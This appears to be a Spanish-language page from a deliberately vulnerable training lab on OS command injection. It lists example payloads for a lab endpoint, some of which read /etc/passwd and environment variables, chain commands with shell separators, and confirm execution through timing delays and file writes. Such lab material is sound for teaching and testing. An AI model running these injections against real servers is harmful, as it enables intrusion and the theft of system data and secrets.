Ejecución de comandos del sistema operativo a través de entrada no sanitizada
Modo Reto activo — explora libremente. Activa el Modo Tutorial si necesitas orientación.
Comando básico para listar archivos del directorio actual
/api/lab/command-injection?cmd=lsQuién está ejecutando el proceso del servidor
/api/lab/command-injection?cmd=whoamiEjecutar dos comandos: listar y leer /etc/passwd
/api/lab/command-injection?cmd=ls;cat /etc/passwdObtener info del kernel del sistema
/api/lab/command-injection?cmd=whoami && uname -aListar procesos y filtrar el servidor
/api/lab/command-injection?cmd=ps aux | grep nodeLeer variables de entorno del proceso
/api/lab/command-injection?cmd=$(env)Nombre del host del servidor
/api/lab/command-injection?cmd=cat /etc/hostnameVersión del kernel Linux
/api/lab/command-injection?cmd=cat /proc/versionConfirmar ejecución de comandos mediante retardo de respuesta
/api/lab/command-injection?cmd=ls;sleep 3Comprobar ejecución midiendo tiempo de respuesta con ping
/api/lab/command-injection?cmd=ping -c 3 127.0.0.1Ejecutar el comando aunque el primero no exista
/api/lab/command-injection?cmd=noexiste || idComprobar si se puede escribir en el sistema
/api/lab/command-injection?cmd=echo pwned > /tmp/aitana.txt && cat /tmp/aitana.txtEste endpoint ejecuta comandos del sistema operativo sin validación. Un atacante puede inyectar comandos maliciosos usando separadores como ';', '&&', '||' o '|' para ejecutar código arbitrario en el servidor.
Esta aplicación es vulnerable por diseño - Solo para propósitos educativos
© 2025 Aitana Security Lab